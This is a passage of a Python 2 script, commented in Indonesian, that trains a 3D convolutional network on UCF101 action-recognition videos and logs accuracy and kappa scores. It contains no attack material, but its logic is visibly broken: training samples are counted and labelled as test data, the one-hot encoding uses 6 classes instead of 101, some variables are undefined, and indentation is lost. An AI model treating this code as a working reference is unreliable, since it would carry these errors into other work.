14 : 'BlowingCandles',
15 : 'BodyWeightSquats',
16 : 'Bowling',
17 : 'BoxingPunchingBag',
18 : 'BoxingSpeedBag',
19 : 'BreastStroke',
20 : 'BrushingTeeth',
21 : 'CleanAndJerk',
22 : 'CliffDiving',
23 : 'CricketBowling',
24 : 'CricketShot',
25 : 'CuttingInKitchen',
26 : 'Diving',
27 : 'Drumming',
28 : 'Fencing',
29 : 'FieldHockeyPenalty',
30 : 'FloorGymnastics',
31 : 'FrisbeeCatch',
32 : 'FrontCrawl',
33 : 'GolfSwing',
34 : 'Haircut',
35 : 'Hammering',
36 : 'HammerThrow',
37 : 'HandstandPushups',
38 : 'HandstandWalking',
39 : 'HeadMassage',
40 : 'HighJump',
41 : 'HorseRace',
42 : 'HorseRiding',
43 : 'HulaHoop',
44 : 'IceDancing',
45 : 'JavelinThrow',
46 : 'JugglingBalls',
47 : 'JumpingJack',
48 : 'JumpRope',
49 : 'Kayaking',
50 : 'Knitting',
51 : 'LongJump',
52 : 'Lunges',
53 : 'MilitaryParade',
54 : 'Mixing',
55 : 'MoppingFloor',
56 : 'Nunchucks',
57 : 'ParallelBars',
58 : 'PizzaTossing',
59 : 'PlayingCello',
60 : 'PlayingDaf',
61 : 'PlayingDhol',
62 : 'PlayingFlute',
63 : 'PlayingGuitar',
64 : 'PlayingPiano',
65 : 'PlayingSitar',
66 : 'PlayingTabla',
67 : 'PlayingViolin',
68 : 'PoleVault',
69 : 'PommelHorse',
70 : 'PullUps',
71 : 'Punch',
72 : 'PushUps',
73 : 'Rafting',
74 : 'RockClimbingIndoor',
75 : 'RopeClimbing',
76 : 'Rowing',
77 : 'SalsaSpin',
78 : 'ShavingBeard',
79 : 'Shotput',
80 : 'SkateBoarding',
81 : 'Skiing',
82 : 'Skijet',
83 : 'SkyDiving',
84 : 'SoccerJuggling',
85 : 'SoccerPenalty',
86 : 'StillRings',
87 : 'SumoWrestling',
88 : 'Surfing',
89 : 'Swing',
90 : 'TableTennisShot',
91 : 'TaiChi',
92 : 'TennisSwing',
93 : 'ThrowDiscus',
94 : 'TrampolineJumping',
95 : 'Typing',
96 : 'UnevenBars',
97 : 'VolleyballSpiking',
98 : 'WalkingWithDog',
99 : 'WallPushups',
100 : 'WritingOnBoard',
101 : 'YoYo'
}.get(x, "----")
R1x = 240
R1y = 320
R2x = 20
R2y = 30
R3x = 20
R3y = 30
RDepth = 32
vartuning = '1Resolusi_320x240'
filenya = 'UCFV1_' + vartuning + '.csv'
with open(filenya, 'w') as out_file:
writer = csv.writer(out_file, lineterminator = '\n')
grup = []
grup.append('Blok ke-')
grup.append('Skor Akurasi')
grup.append('Skor Kappa')
writer.writerows([grup])
grup = []
X_train_R1 = []
X_train_R2 = []
X_train_R3 = []
labels_train = []
count_train = 0
X_test_R1 = []
X_test_R2 = []
X_test_R3 = []
labels_test = []
count_test = 0
# training data input
for labelIdx in range(1, 101):
print labelIdx
listing = os.listdir('TestData/' + getLabelFromIdx(labelIdx) + '/')
for vid in listing:
vid = 'TestData/' + getLabelFromIdx(labelIdx) + '/' +vid
framesR1 = []
framesR2 = []
framesR3 = []
cap = cv2.VideoCapture(vid)
fps = cap.get(5)
#print "Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}".format(fps)
#test
frame = []
ret, frame = cap.read()
#print frame.shape
if frame is None:
print "image not readable"
break
count = 0
kondisi = True
while kondisi == True:
ret, frame = cap.read()
if frame is None:
print "skipping vid"
break
count += 1
frameR1 = cv2.resize(frame, (R1x, R1y), interpolation=cv2.INTER_AREA)
framesR1.append(frameR1)
frameR2 = cv2.resize(frame, (R2x, R2y), interpolation=cv2.INTER_AREA)
framesR2.append(frameR2)
frameR3 = cv2.resize(frame, (R3x, R3y), interpolation=cv2.INTER_AREA)
framesR3.append(frameR3)
#plt.imshow(gray, cmap = plt.get_cmap('gray'))
#plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis
#plt.show()
#cv2.imshow('frame',gray)
if count == 50:
kondisi = False
if cv2.waitKey(1) & 0xFF == ord('q'):
break
count_test += 1
label = labelIdx-1
labels_test.append(label)
cap.release()
cv2.destroyAllWindows()
inputR1=np.array(framesR1)
inputR2=np.array(framesR2)
inputR3=np.array(framesR3)
#print input.shape
iptR1=inputR1
iptR2=inputR2
iptR3=inputR3
#print ipt.shape
X_test_R1.append(iptR1)
X_test_R2.append(iptR2)
X_test_R3.append(iptR3)
listing = os.listdir('TrainData/' + getLabelFromIdx(labelIdx) + '/')
for vid in listing:
vid = 'TrainData/' + getLabelFromIdx(labelIdx) + '/' +vid
framesR1 = []
framesR2 = []
framesR3 = []
cap = cv2.VideoCapture(vid)
fps = cap.get(5)
#print "Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}".format(fps)
#test
frame = []
ret, frame = cap.read()
#print frame.shape
if frame is None:
print "image not readable"
break
count = 0
kondisi = True
while kondisi == True:
ret, frame = cap.read()
if frame is None:
print "skipping vid"
break
count += 1
frameR1 = cv2.resize(frame, (R1x, R1y), interpolation=cv2.INTER_AREA)
framesR1.append(frameR1)
frameR2 = cv2.resize(frame, (R2x, R2y), interpolation=cv2.INTER_AREA)
framesR2.append(frameR2)
frameR3 = cv2.resize(frame, (R3x, R3y), interpolation=cv2.INTER_AREA)
framesR3.append(frameR3)
#plt.imshow(gray, cmap = plt.get_cmap('gray'))
#plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis
#plt.show()
#cv2.imshow('frame',gray)
if count == 50:
kondisi = False
if cv2.waitKey(1) & 0xFF == ord('q'):
break
count_test += 1
labels_test.append(0)
cap.release()
cv2.destroyAllWindows()
inputR1=np.array(framesR1)
inputR2=np.array(framesR2)
inputR3=np.array(framesR3)
#print input.shape
iptR1=inputR1
iptR2=inputR2
iptR3=inputR3
#print ipt.shape
X_train_R1.append(iptR1)
X_train_R2.append(iptR2)
X_train_R3.append(iptR3)
# formatting data
X_train_R1_array = (X_train_R1)
X_train_R2_array = (X_train_R2)
X_train_R3_array = (X_train_R3)
labels_train_array = np.array(labels_train)
Y_train = np_utils.to_categorical(labels_train_array, 6)
X_test_R1_array = (X_test_R1)
X_test_R2_array = (X_test_R2)
X_test_R3_array = (X_test_R3)
labels_test_array = np.array(labels_test)
Y_test = np_utils.to_categorical(labels_test_array, 6)
test_set_R1 = np.zeros((count_test, RDepth, R1y,R1x,3))
test_set_R2 = np.zeros((count_test, RDepth, R2y,R2x,3))
test_set_R3 = np.zeros((count_test, RDepth, R3y,R3x,3))
for h in xrange(count_test):
test_set_R1[h][:][:][:][:]=X_test_R1_array[h]
test_set_R2[h][:][:][:][:]=X_test_R2_array[h]
test_set_R3[h][:][:][:][:]=X_test_R3_array[h]
train_set_R1 = np.zeros((count_train, RDepth, R1y,R1x,3))
train_set_R2 = np.zeros((count_train, RDepth, R2y,R2x,3))
train_set_R3 = np.zeros((count_train, RDepth, R3y,R3x,3))
for h in xrange(count_train):
train_set_R1[h][:][:][:][:]=X_train_R1_array[h]
train_set_R2[h][:][:][:][:]=X_train_R2_array[h]
train_set_R3[h][:][:][:][:]=X_train_R3_array[h]
train_set_R1 = train_set_R1.astype('float32')
train_set_R1 -= 127.5
train_set_R1 /=127.5
train_set_R2 = train_set_R2.astype('float32')
train_set_R2 -= 127.5
train_set_R2 /=127.5
train_set_R3 = train_set_R3.astype('float32')
train_set_R3 -= 127.5
train_set_R3 /=127.5
test_set_R1 = test_set_R1.astype('float32')
test_set_R1 -= 127.5
test_set_R1 /=127.5
test_set_R2 = test_set_R2.astype('float32')
test_set_R2 -= 127.5
test_set_R2 /=127.5
test_set_R3 = test_set_R3.astype('float32')
test_set_R3 -= 127.5
test_set_R3 /=127.5
#%% definisikan sebuah model
# # Parameter tuning
# jumEpoch = 25
# nb_classes = 8
# #Lengan A
# filterNumL1 = 16 # jumlah filter L1
# filterSizeXYL1 = 5 #ukuran filter dimensi spasial
# filterSizeTL1 = 3#ukuran filter dimensi spasial
#
# poolingSizeXYL1 = 3
# poolingSizeTL1 = 1
# poolingStrideXYL1 = 1
# poolingStrideTL1 = 1 #parameter pooling L1
# #Lengan B
# filterNumL1B = 32 # jumlah filter L1
# filterSizeXYL1B = 3 #ukuran filter dimensi spasial
# filterSizeTL1B = 3 #ukuran filter dimensi spasial
#
# poolingSizeXYL1B = 3
# poolingSizeTL1B = 1
# poolingStrideXYL1B = 1
# poolingStrideTL1B = 1 #parameter pooling L1
# Define model
# modelA = Sequential()
# modelA.add(Convolution3D(filterNumL1,kernel_dim1=filterSizeXYL1, kernel_dim2=filterSizeXYL1, kernel_dim3=filterSizeTL1, input_shape=(10, 20, 30, 3), activation='relu', dim_ordering='tf'))
# modelA.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
# modelA.add(SpatialDropout3D(0.4))
# modelA.add(Flatten())
#
# modelB = Sequential()
# modelB.add(Convolution3D(filterNumL1B,kernel_dim1=filterSizeXYL1B, kernel_dim2=filterSizeXYL1B, kernel_dim3=filterSizeTL1B, input_shape=(10, 20, 30, 3), activation='relu', dim_ordering='tf'))
# modelB.add(MaxPooling3D(pool_size=(poolingSizeXYL1B, poolingSizeXYL1B, poolingSizeTL1B), dim_ordering='tf'))
# modelB.add(SpatialDropout3D(0.4))
# modelB.add(Flatten())
#
#
# model = Sequential()
# model.add(Merge([modelA, modelB], mode='concat'))
# model.add(Dense(paramuji, init='normal', activation='relu'))
#
# model.add(Dropout(0.4))
#
# model.add(Dense(nb_classes,init='normal'))
#
# model.add(Activation('softmax'))
# model.summary()
# model.compile(loss='categorical_crossentropy', optimizer='RMSprop', metrics = ["accuracy"])
#
#
# # Train the model
#
# hist = model.fit([train_set, train_set], Y_train, validation_data=([test_set, test_set], Y_test),
# batch_size=15, nb_epoch = jumEpoch, show_accuracy=True, shuffle=True, verbose = 0)
#
# # Evaluate the model
# score = model.evaluate([test_set, test_set], Y_test, batch_size=15, show_accuracy=True)
#
# Define model
# Parameter tuning
jumEpoch = 50
nb_classes = 101
filterNumL1 = 32 # jumlah filter L1
filterSizeXYL1 = 9 #ukuran filter dimensi spasial
filterSizeTL1 = 5#ukuran filter dimensi spasial
poolingSizeXYL1 = 2
poolingSizeTL1 = 2
poolingStrideXYL1 = 1
poolingStrideTL1 = 1 #parameter pooling L1
filterNumL2 = 64 # jumlah filter L1
filterSizeXYL2 = 7 #ukuran filter dimensi spasial
filterSizeTL2 = 5#ukuran filter dimensi spasial
model = Sequential()
model.add(Convolution3D(filterNumL1,kernel_dim1=filterSizeTL1, kernel_dim2=filterSizeXYL1, kernel_dim3=filterSizeXYL1, input_shape=(RDepth, R1y, R1x,3), activation='relu', dim_ordering='tf'))
#model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
model.add(SpatialDropout3D(0.3))
model.add(Convolution3D(filterNumL2,kernel_dim1=filterSizeTL2, kernel_dim2=filterSizeXYL2, kernel_dim3=filterSizeXYL2, activation='relu', dim_ordering='tf'))
#model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
model.add(SpatialDropout3D(0.3))
model.add(Convolution3D(filterNumL2,kernel_dim1=3, kernel_dim2=5, kernel_dim3=5, activation='relu', dim_ordering='tf'))
#model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
model.add(SpatialDropout3D(0.3))
model.add(Flatten())
model.add(Dense(256, init='normal', activation='relu'))
model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(Dropout(0.5))
model.add(Dense(64, init='normal', activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes,init='normal'))
model.add(Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='Adam', metrics = ['acc'])
# Train the model
nama_filenya = "weights_" + vartuning + "_K_" + str(k) +"_.hdf5"
checkpointer = ModelCheckpoint(filepath=nama_filenya, monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=True)
hist = model.fit(train_set_R1, Y_train, validation_data=(test_set_R1, Y_test),
batch_size=8, nb_epoch = jumEpoch, shuffle=True, verbose = 1, callbacks = [checkpointer])
# Evaluate the model
# load best model
model.load_weights(nama_filenya)
score = model.evaluate(test_set_R1, Y_test, batch_size=8)
print "Skor Model:"
print score[1]
Y_pred = model.predict_classes(test_set_R1, batch_size = 8)
grup.append(kcv)
grup.append(score[1])
cohennya = cohen_kappa_score(np.argmax(Y_test,axis=1), Y_pred)
print "kohen kappa:"
print cohennya
grup.append(cohennya)
writer.writerows([grup])
| 35.868421 | 213 | 0.56335 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.